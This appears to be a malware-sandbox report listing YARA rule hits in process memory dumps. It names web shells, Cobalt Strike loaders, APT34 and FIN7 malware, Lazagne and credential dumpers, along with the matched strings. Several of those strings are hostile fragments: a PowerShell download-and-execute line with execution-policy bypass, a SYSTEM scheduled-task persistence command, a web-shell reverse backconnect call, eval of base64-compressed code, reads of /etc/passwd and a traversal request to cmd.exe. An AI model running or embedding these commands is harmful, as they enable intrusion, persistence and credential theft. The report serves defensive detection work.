0000000A.00000003.323793714.00000000050C1000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x9d0:$a: Amplia Security
|
0000000A.00000003.323793714.00000000050C1000.00000004.00000001.sdmp | webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat | Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php | Florian Roth | - 0xbf8:$s8: if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
- 0xd38:$s9: foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
|
0000000A.00000003.323793714.00000000050C1000.00000004.00000001.sdmp | Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php | Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
0000000A.00000003.321850832.00000000068D1000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x191d0:$a: Amplia Security
- 0x19180:$c: getlsasrvaddr.exe
- 0x26140:$d: Cannot get PID of LSASS.EXE
- 0x262c0:$e: extract the TGT session key
|
0000000A.00000003.321850832.00000000068D1000.00000004.00000001.sdmp | SQLMap | This signature detects the SQLMap SQL injection tool | Florian Roth | - 0x2a6c8:$s1: except SqlmapBaseException, ex:
|
0000000A.00000003.321850832.00000000068D1000.00000004.00000001.sdmp | PortRacer | Auto-generated rule on file PortRacer.exe | yarGen Yara Rule Generator by Florian Roth | - 0x25d20:$s0: Auto Scroll BOTH Text Boxes
- 0x25f90:$s4: Start/Stop Portscanning
- 0x2a348:$s6: Auto Save LogFile by pressing STOP
|
00000013.00000003.473985141.0000000006BA5000.00000004.00000001.sdmp | Hacktool_Strings_p0wnedShell | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs | Florian Roth | - 0x8818:$x5: p0wnedShellx64
|
00000013.00000003.428708026.0000000006BA5000.00000004.00000001.sdmp | Hacktool_Strings_p0wnedShell | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs | Florian Roth | - 0x8818:$x5: p0wnedShellx64
|
00000013.00000003.436058475.0000000006B94000.00000004.00000001.sdmp | webshell_PHP_b37 | Web Shell - file b37.php | Florian Roth | - 0x7220:$s0: xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc
|
00000013.00000003.445137935.0000000006BFE000.00000004.00000001.sdmp | multiple_webshells_0015 | Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x215:$s1: $_POST['backconnectip']
|
00000013.00000003.445137935.0000000006BFE000.00000004.00000001.sdmp | Webshell_27_9_acid_c99_locus7s | Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt | Florian Roth | - 0x1f8:$s0: $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
|
00000013.00000003.416791801.00000000051F5000.00000004.00000001.sdmp | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth | - 0x2cf86:$sa2: -EncodedCommand
- 0x2cf74:$sc1: -nop
- 0x2cf79:$se2: -exec bypass
- 0x2cf79:$se4: -exec bypass
|
00000013.00000003.416791801.00000000051F5000.00000004.00000001.sdmp | WiltedTulip_ReflectiveLoader | Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip | Florian Roth | - 0x2cf6a:$x1: powershell -nop -exec bypass -EncodedCommand "%s"
- 0x2cfa0:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
- 0x2cf39:$x5: Failed to impersonate logged on user %d (%u)
|
00000013.00000003.416791801.00000000051F5000.00000004.00000001.sdmp | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
0000000A.00000003.316101546.000000000684D000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | |
0000000A.00000003.316101546.000000000684D000.00000004.00000001.sdmp | shankar_php_php | Semi-Auto-generated - file shankar.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
0000000A.00000003.312404128.0000000006667000.00000004.00000001.sdmp | Hacktool_Strings_p0wnedShell | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs | Florian Roth | - 0x5558:$x5: p0wnedShellx64
|
0000000A.00000003.323779225.0000000006626000.00000004.00000001.sdmp | FVEY_ShadowBroker_Auct_Dez16_Strings | String from the ShodowBroker Files Screenshots - Dec 2016 | Florian Roth | - 0xa7e:$s11: elatedmonkey
- 0x656:$elf4: charm_saver
- 0xf76:$elf8: ebbshave
- 0xd96:$elf9: eggbasket
- 0xa47:$elf17: ghost_sparc
- 0xeae:$elf18: jackpop
- 0x656:$pe2: charm_saver
- 0xa53:$pe3: ghost_x86
|
0000000A.00000003.323779225.0000000006626000.00000004.00000001.sdmp | webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit | Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php | Florian Roth | - 0x1e90:$s1: <option value="cat /etc/passwd">/etc/passwd</option>
|
0000000A.00000003.323779225.0000000006626000.00000004.00000001.sdmp | WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit | PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php | Florian Roth | - 0x1e90:$s13: <option value="cat /etc/passwd">/etc/passwd</option>
|
00000013.00000003.464557374.0000000006D87000.00000004.00000001.sdmp | webshell_php_gzinflated | PHP webshell which directly eval()s obfuscated string | Arnim Rupp | - 0xdd8:$php: <?
- 0xdde:$payload3: eval(gzuncompress(base64_decode(
|
00000013.00000003.464557374.0000000006D87000.00000004.00000001.sdmp | webshell_php_h6ss | Web Shell - file h6ss.php | Florian Roth | - 0xdd8:$s0: <?php eval(gzuncompress(base64_decode("
|
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | HKTL_Lazagne_Gen_18 | Detects Lazagne password extractor hacktool | Florian Roth | - 0x8b74:$x1: lazagne.config.powershell_execute(
- 0x8b9b:$x2: creddump7.win32.
- 0x8bb0:$x3: lazagne.softwares.windows.hashdump
- 0x8bd7:$x4: .softwares.memory.libkeepass.common(
|
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | HKTL_NoPowerShell | Detects NoPowerShell hack tool | Florian Roth | - 0x7f19:$x1: \NoPowerShell.pdb
|
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | HKTL_LNX_Pnscan | Detects Pnscan port scanner | Florian Roth | - 0x2acc:$x1: -R<hex list> Hex coded response string to look for.
- 0x2b06:$x2: This program implements a multithreaded TCP port scanner.
|
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | SUSP_Script_Obfuscation_Char_Concat | Detects strings found in sample from CN group repo leak in October 2018 | Florian Roth | - 0xb2ce:$s1: "c" & "r" & "i" & "p" & "t"
|
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | SUSP_Netsh_PortProxy_Command | Detects a suspicious command line with netsh and the portproxy command | Florian Roth | - 0x39ce:$x1: netsh interface portproxy add v4tov4 listenport=
|
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | MAL_HawkEye_Keylogger_Gen_Dec18 | Detects HawkEye Keylogger Reborn | Florian Roth | - 0x8d8e:$s2: _ScreenshotLogger
- 0x8da4:$s3: _PasswordStealer
|
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | VUL_JQuery_FileUpload_CVE_2018_9206 | Detects JQuery File Upload vulnerability CVE-2018-9206 | Florian Roth | - 0xa0a8:$s1: error_reporting(E_ALL | E_STRICT);
- 0xa0cf:$s2: require('UploadHandler.php');
- 0xa0f1:$s3: $upload_handler = new UploadHandler();
|
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | APT_FIN7_Strings_Aug18_1 | Detects strings from FIN7 report in August 2018 | Florian Roth | - 0xd807:$s1: &&call %a01%%a02% /e:jscript
- 0xd828:$s2: wscript.exe //b /e:jscript %TEMP%
- 0xd84e:$s3: w=wsc@ript /b
- 0xd862:$s4: @echo %w:@=%|cmd
- 0xd877:$s5: & wscript //b /e:jscript
|
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | APT_FIN7_MalDoc_Aug18_1 | Detects malicious Doc from FIN7 campaign | Florian Roth | - 0xdcfd:$s1: <photoshop:LayerText>If this document was downloaded from your email, please click "Enable editing" from the yellow bar above
|
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | HKTL_PowerKatz_Feb19_1 | Detetcs a tool used in the Australian Parliament House network compromise | Florian Roth | - 0x63c0:$x1: Powerkatz32
- 0x63d0:$x2: Powerkatz64
- 0x63e0:$s1: GetData: not found taskName
- 0x6400:$s2: GetRes Ex:
|
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | HKTL_Unknown_Feb19_1 | Detetcs a tool used in the Australian Parliament House network compromise | Florian Roth | - 0x6572:$x1: not a valid timeout format!
- 0x6592:$x2: host can not be empty!
- 0x65ad:$x3: not a valid port format!
- 0x65ca:$x4: {0} - {1} TTL={2} time={3}
- 0x65e9:$x5: ping count is not a correct format!
- 0x6611:$s1: The result is too large,program store to '{0}'.Please download it manully.
- 0x6660:$s2: C:\Windows\temp\
|
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth | - 0xe0d2:$sb1: -w Hidden
- 0xe0af:$sc1: -NoP
- 0xe0b4:$sd1: -NonI
- 0x4067:$se2: -exec bypass
- 0xe0ba:$se3: -ExecutionPolicy Bypass
- 0x4067:$se4: -exec bypass
|
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | APT_APT34_PS_Malware_Apr19_1 | Detects APT34 PowerShell malware | Florian Roth | - 0x3b83:$x1: = get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID
- 0x3de4:$x1: = get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID
- 0x3bd9:$x2: Write-Host "excepton occured!"
- 0x3bfc:$s1: Start-Sleep -s 1;
- 0x3c12:$s2: Start-Sleep -m 100;
|
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | APT_APT34_PS_Malware_Apr19_2 | Detects APT34 PowerShell malware | Florian Roth | - 0x3daa:$x1: = "http://" + [System.Net.Dns]::GetHostAddresses("
- 0x3de1:$x2: $t = get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID
- 0x3e3a:$x3: | Where { $_ -notmatch '^\s+$' }
- 0x3e5f:$s1: = new-object System.Net.WebProxy($u, $true);
- 0x3e90:$s2: -eq "dom"){$
- 0x3ea2:$s3: -eq "srv"){$
- 0x3eb4:$s4: +"<>" | Set-Content
|
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | APT_APT34_PS_Malware_Apr19_3 | Detects APT34 PowerShell malware | Florian Roth | - 0x4059:$x1: Powershell.exe -exec bypass -file ${global:$address1}
- 0x4093:$x2: schtasks /create /F /ru SYSTEM /sc minute /mo 10 /tn
- 0x40cc:$x3: "\UpdateTasks\UpdateTaskHosts"
- 0x40ef:$x4: wscript /b \`"${global:$address1
- 0x4114:$x5: ::FromBase64String([string]${global:$http_ag}))
- 0x4148:$x6: .run command1, 0, false" | Out-File
- 0x4171:$x7: \UpdateTask.vbs
- 0x4185:$x8: hUpdater.ps1
|
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | PUA_CryptoMiner_Jan19_1 | Detects Crypto Miner strings | Florian Roth | - 0x6ec4:$s1: Stratum notify: invalid Merkle branch
- 0x6eee:$s2: -t, --threads=N number of miner threads (default: number of processors)
- 0x6f40:$s3: User-Agent: cpuminer/
- 0x6f5a:$s4: hash > target (false positive)
- 0x6f7d:$s5: thread %d: %lu hashes, %s khash/s
|
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | HKTL_Dsniff | Detects Dsniff hack tool | Florian Roth | - 0x53bf:$x1: .*account.*|.*acct.*|.*domain.*|.*login.*|.*member.*
|
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_1 | Detects HOPLIGHT malware used by HiddenCobra APT group | Florian Roth | - 0x42fe:$s1: www.naver.com
- 0x473c:$s1: www.naver.com
- 0x4310:$s2: PolarSSL Test CA0
|
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | JoeSecurity_CryptoMiner | Yara detected Crypto Miner | Joe Security | |
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp | JoeSecurity_Mirai_6 | Yara detected Mirai | Joe Security | |
0000000A.00000003.324847009.0000000006648000.00000004.00000001.sdmp | FVEY_ShadowBroker_Auct_Dez16_Strings | String from the ShodowBroker Files Screenshots - Dec 2016 | Florian Roth | - 0x299e:$s2: Auditcleaner
- 0xece:$elf12: envoytomato
- 0xf2e:$elf14: estopmoonlit
|
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | HKTL_Lazagne_Gen_18 | Detects Lazagne password extractor hacktool | Florian Roth | - 0x8b74:$x1: lazagne.config.powershell_execute(
- 0x8b9b:$x2: creddump7.win32.
- 0x8bb0:$x3: lazagne.softwares.windows.hashdump
- 0x8bd7:$x4: .softwares.memory.libkeepass.common(
|
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | HKTL_NoPowerShell | Detects NoPowerShell hack tool | Florian Roth | - 0x7f19:$x1: \NoPowerShell.pdb
|
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | HKTL_LNX_Pnscan | Detects Pnscan port scanner | Florian Roth | - 0x2acc:$x1: -R<hex list> Hex coded response string to look for.
- 0x2b06:$x2: This program implements a multithreaded TCP port scanner.
|
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | SUSP_Script_Obfuscation_Char_Concat | Detects strings found in sample from CN group repo leak in October 2018 | Florian Roth | - 0xb2ce:$s1: "c" & "r" & "i" & "p" & "t"
|
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | SUSP_Netsh_PortProxy_Command | Detects a suspicious command line with netsh and the portproxy command | Florian Roth | - 0x39ce:$x1: netsh interface portproxy add v4tov4 listenport=
|
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | MAL_HawkEye_Keylogger_Gen_Dec18 | Detects HawkEye Keylogger Reborn | Florian Roth | - 0x8d8e:$s2: _ScreenshotLogger
- 0x8da4:$s3: _PasswordStealer
|
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | VUL_JQuery_FileUpload_CVE_2018_9206 | Detects JQuery File Upload vulnerability CVE-2018-9206 | Florian Roth | - 0xa0a8:$s1: error_reporting(E_ALL | E_STRICT);
- 0xa0cf:$s2: require('UploadHandler.php');
- 0xa0f1:$s3: $upload_handler = new UploadHandler();
|
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | APT_FIN7_Strings_Aug18_1 | Detects strings from FIN7 report in August 2018 | Florian Roth | - 0xd807:$s1: &&call %a01%%a02% /e:jscript
- 0xd828:$s2: wscript.exe //b /e:jscript %TEMP%
- 0xd84e:$s3: w=wsc@ript /b
- 0xd862:$s4: @echo %w:@=%|cmd
- 0xd877:$s5: & wscript //b /e:jscript
|
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | APT_FIN7_MalDoc_Aug18_1 | Detects malicious Doc from FIN7 campaign | Florian Roth | - 0xdcfd:$s1: <photoshop:LayerText>If this document was downloaded from your email, please click "Enable editing" from the yellow bar above
|
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | HKTL_PowerKatz_Feb19_1 | Detetcs a tool used in the Australian Parliament House network compromise | Florian Roth | - 0x63c0:$x1: Powerkatz32
- 0x63d0:$x2: Powerkatz64
- 0x63e0:$s1: GetData: not found taskName
- 0x6400:$s2: GetRes Ex:
|
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | HKTL_Unknown_Feb19_1 | Detetcs a tool used in the Australian Parliament House network compromise | Florian Roth | - 0x6572:$x1: not a valid timeout format!
- 0x6592:$x2: host can not be empty!
- 0x65ad:$x3: not a valid port format!
- 0x65ca:$x4: {0} - {1} TTL={2} time={3}
- 0x65e9:$x5: ping count is not a correct format!
- 0x6611:$s1: The result is too large,program store to '{0}'.Please download it manully.
- 0x6660:$s2: C:\Windows\temp\
|
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth | - 0xe0d2:$sb1: -w Hidden
- 0xe0af:$sc1: -NoP
- 0xe0b4:$sd1: -NonI
- 0x4067:$se2: -exec bypass
- 0xe0ba:$se3: -ExecutionPolicy Bypass
- 0x4067:$se4: -exec bypass
|
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | APT_APT34_PS_Malware_Apr19_1 | Detects APT34 PowerShell malware | Florian Roth | - 0x3b83:$x1: = get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID
- 0x3de4:$x1: = get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID
- 0x3bd9:$x2: Write-Host "excepton occured!"
- 0x3bfc:$s1: Start-Sleep -s 1;
- 0x3c12:$s2: Start-Sleep -m 100;
|
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | APT_APT34_PS_Malware_Apr19_2 | Detects APT34 PowerShell malware | Florian Roth | - 0x3daa:$x1: = "http://" + [System.Net.Dns]::GetHostAddresses("
- 0x3de1:$x2: $t = get-wmiobject Win32_ComputerSystemProduct | Select-Object -ExpandProperty UUID
- 0x3e3a:$x3: | Where { $_ -notmatch '^\s+$' }
- 0x3e5f:$s1: = new-object System.Net.WebProxy($u, $true);
- 0x3e90:$s2: -eq "dom"){$
- 0x3ea2:$s3: -eq "srv"){$
- 0x3eb4:$s4: +"<>" | Set-Content
|
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | APT_APT34_PS_Malware_Apr19_3 | Detects APT34 PowerShell malware | Florian Roth | - 0x4059:$x1: Powershell.exe -exec bypass -file ${global:$address1}
- 0x4093:$x2: schtasks /create /F /ru SYSTEM /sc minute /mo 10 /tn
- 0x40cc:$x3: "\UpdateTasks\UpdateTaskHosts"
- 0x40ef:$x4: wscript /b \`"${global:$address1
- 0x4114:$x5: ::FromBase64String([string]${global:$http_ag}))
- 0x4148:$x6: .run command1, 0, false" | Out-File
- 0x4171:$x7: \UpdateTask.vbs
- 0x4185:$x8: hUpdater.ps1
|
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | PUA_CryptoMiner_Jan19_1 | Detects Crypto Miner strings | Florian Roth | - 0x6ec4:$s1: Stratum notify: invalid Merkle branch
- 0x6eee:$s2: -t, --threads=N number of miner threads (default: number of processors)
- 0x6f40:$s3: User-Agent: cpuminer/
- 0x6f5a:$s4: hash > target (false positive)
- 0x6f7d:$s5: thread %d: %lu hashes, %s khash/s
|
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | HKTL_Dsniff | Detects Dsniff hack tool | Florian Roth | - 0x53bf:$x1: .*account.*|.*acct.*|.*domain.*|.*login.*|.*member.*
|
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_1 | Detects HOPLIGHT malware used by HiddenCobra APT group | Florian Roth | - 0x42fe:$s1: www.naver.com
- 0x473c:$s1: www.naver.com
- 0x4310:$s2: PolarSSL Test CA0
|
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | JoeSecurity_CryptoMiner | Yara detected Crypto Miner | Joe Security | |
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp | JoeSecurity_Mirai_6 | Yara detected Mirai | Joe Security | |
0000000A.00000003.316213218.0000000006859000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | |
00000013.00000003.461202031.0000000006E05000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x28af0:$c: getlsasrvaddr.exe
- 0x2c420:$e: extract the TGT session key
|
00000013.00000003.461202031.0000000006E05000.00000004.00000001.sdmp | SQLMap | This signature detects the SQLMap SQL injection tool | Florian Roth | - 0x3a6f0:$s1: except SqlmapBaseException, ex:
|
00000013.00000003.461202031.0000000006E05000.00000004.00000001.sdmp | PortRacer | Auto-generated rule on file PortRacer.exe | yarGen Yara Rule Generator by Florian Roth | - 0x2c090:$s0: Auto Scroll BOTH Text Boxes
- 0x2c4e0:$s4: Start/Stop Portscanning
- 0x3a6b8:$s6: Auto Save LogFile by pressing STOP
|
0000000A.00000003.323605826.0000000006667000.00000004.00000001.sdmp | Hacktool_Strings_p0wnedShell | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs | Florian Roth | - 0x5558:$x5: p0wnedShellx64
|
00000013.00000003.433232225.00000000052E4000.00000004.00000001.sdmp | FVEY_ShadowBroker_Auct_Dez16_Strings | String from the ShodowBroker Files Screenshots - Dec 2016 | Florian Roth | - 0x8f5e:$s2: Auditcleaner
- 0xa6a6:$s11: elatedmonkey
- 0xa716:$elf4: charm_saver
- 0x976e:$elf12: envoytomato
- 0x973e:$elf14: estopmoonlit
- 0xa8d7:$elf17: ghost_sparc
- 0xa1c6:$elf19: orleans_stride
- 0x9ec6:$elf21: seconddate
- 0xa716:$pe2: charm_saver
- 0xa8e3:$pe3: ghost_x86
|
00000013.00000003.413817784.00000000052A4000.00000004.00000001.sdmp | FVEY_ShadowBroker_Auct_Dez16_Strings | String from the ShodowBroker Files Screenshots - Dec 2016 | Florian Roth | - 0x48f5e:$s2: Auditcleaner
- 0x4a6a6:$s11: elatedmonkey
- 0x4a716:$elf4: charm_saver
- 0x4976e:$elf12: envoytomato
- 0x4973e:$elf14: estopmoonlit
- 0x4a8d7:$elf17: ghost_sparc
- 0x4a1c6:$elf19: orleans_stride
- 0x49ec6:$elf21: seconddate
- 0x4a716:$pe2: charm_saver
- 0x4a8e3:$pe3: ghost_x86
|
00000003.00000002.522931627.000000000237B000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x51cf:$a: Amplia Security
- 0x5347:$a: Amplia Security
- 0x5365:$c: getlsasrvaddr.exe
- 0x5385:$d: Cannot get PID of LSASS.EXE
- 0x53af:$e: extract the TGT session key
- 0x53d9:$f: PPWDUMP_DATA
|
00000003.00000002.522931627.000000000237B000.00000004.00000001.sdmp | scanarator | Auto-generated rule on file scanarator.exe | yarGen Yara Rule Generator by Florian Roth | - 0x5103:$s4: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
|
0000000A.00000003.324801435.0000000006627000.00000004.00000001.sdmp | webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit | Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php | Florian Roth | - 0xe90:$s1: <option value="cat /etc/passwd">/etc/passwd</option>
|
0000000A.00000003.324801435.0000000006627000.00000004.00000001.sdmp | WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit | PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php | Florian Roth | - 0xe90:$s13: <option value="cat /etc/passwd">/etc/passwd</option>
|
00000013.00000003.460017323.0000000006DFE000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x2faf0:$c: getlsasrvaddr.exe
- 0x33420:$e: extract the TGT session key
|
00000013.00000003.460017323.0000000006DFE000.00000004.00000001.sdmp | SQLMap | This signature detects the SQLMap SQL injection tool | Florian Roth | - 0x416f0:$s1: except SqlmapBaseException, ex:
|
00000013.00000003.460017323.0000000006DFE000.00000004.00000001.sdmp | PortRacer | Auto-generated rule on file PortRacer.exe | yarGen Yara Rule Generator by Florian Roth | - 0x33090:$s0: Auto Scroll BOTH Text Boxes
- 0x334e0:$s4: Start/Stop Portscanning
- 0x416b8:$s6: Auto Save LogFile by pressing STOP
|
0000000A.00000003.318816470.000000000688B000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | |
0000000A.00000003.308810849.00000000050AA000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x179d0:$a: Amplia Security
|
0000000A.00000003.308810849.00000000050AA000.00000004.00000001.sdmp | webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat | Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php | Florian Roth | - 0x17bf8:$s8: if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
- 0x17d38:$s9: foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
|
0000000A.00000003.308810849.00000000050AA000.00000004.00000001.sdmp | Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php | Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
00000013.00000003.481677976.0000000006BA6000.00000004.00000001.sdmp | Hacktool_Strings_p0wnedShell | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs | Florian Roth | - 0x7818:$x5: p0wnedShellx64
|
0000000A.00000003.310723677.00000000050AA000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x179d0:$a: Amplia Security
|
0000000A.00000003.310723677.00000000050AA000.00000004.00000001.sdmp | webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat | Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php | Florian Roth | - 0x17bf8:$s8: if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
- 0x17d38:$s9: foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
|
0000000A.00000003.310723677.00000000050AA000.00000004.00000001.sdmp | Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php | Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
00000013.00000003.456923467.0000000006DC6000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x67af0:$c: getlsasrvaddr.exe
- 0x6b420:$e: extract the TGT session key
- 0xaf90:$f: PPWDUMP_DATA
|
00000013.00000003.456923467.0000000006DC6000.00000004.00000001.sdmp | SQLMap | This signature detects the SQLMap SQL injection tool | Florian Roth | - 0x796f0:$s1: except SqlmapBaseException, ex:
|
00000013.00000003.456923467.0000000006DC6000.00000004.00000001.sdmp | PortRacer | Auto-generated rule on file PortRacer.exe | yarGen Yara Rule Generator by Florian Roth | - 0x6b090:$s0: Auto Scroll BOTH Text Boxes
- 0x6b4e0:$s4: Start/Stop Portscanning
- 0x796b8:$s6: Auto Save LogFile by pressing STOP
|
0000000A.00000003.325411258.0000000006626000.00000004.00000001.sdmp | FVEY_ShadowBroker_Auct_Dez16_Strings | String from the ShodowBroker Files Screenshots - Dec 2016 | Florian Roth | - 0xa7e:$s11: elatedmonkey
- 0x656:$elf4: charm_saver
- 0xf76:$elf8: ebbshave
- 0xd96:$elf9: eggbasket
- 0xa47:$elf17: ghost_sparc
- 0xeae:$elf18: jackpop
- 0x656:$pe2: charm_saver
- 0xa53:$pe3: ghost_x86
|
00000013.00000003.454771924.0000000006D6F000.00000004.00000001.sdmp | webshell_php_gzinflated | PHP webshell which directly eval()s obfuscated string | Arnim Rupp | - 0x12e80:$php: <?
- 0x15668:$php: <?
- 0x16959:$php: <?
- 0x18dd8:$php: <?
- 0x18dde:$payload3: eval(gzuncompress(base64_decode(
|
00000013.00000003.454771924.0000000006D6F000.00000004.00000001.sdmp | webshell_php_h6ss | Web Shell - file h6ss.php | Florian Roth | - 0x18dd8:$s0: <?php eval(gzuncompress(base64_decode("
|
00000013.00000003.423368197.00000000051EC000.00000004.00000001.sdmp | Amplia_Security_Tool | Amplia Security Tool | unknown | - 0x7580:$a: Amplia Security
|
00000013.00000003.423368197.00000000051EC000.00000004.00000001.sdmp | Fierce2 | This signature detects the Fierce2 domain scanner | Florian Roth | - 0x7398:$s1: $tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,
|
00000013.00000003.423368197.00000000051EC000.00000004.00000001.sdmp | webshell_Shell_ci_Biz_was_here_c100_v_xxx | Web Shell - from files Shell [ci | unknown | - 0x7758:$s3: <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null"
- 0x71b8:$s7: <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/de
|
00000013.00000003.423368197.00000000051EC000.00000004.00000001.sdmp | Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php | Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | |
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf | Metasploit Payloads - file msf.sh | Florian Roth | - 0x3c2f6:$s1: export buf=\
|
0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp | Msfpayloads_msf_2 | Metasploit Payloads - file msf.asp | Florian Roth | - 0x3c42f:$s1: & "\" & "svchost.exe"
- 0x3f71:$s2: CreateObject("Wscript.Shell")
- 0x3c449:$s2: CreateObject("Wscript.Shell")
- 0x3d6bf:$s2: CreateObject("Wscript.Shell")
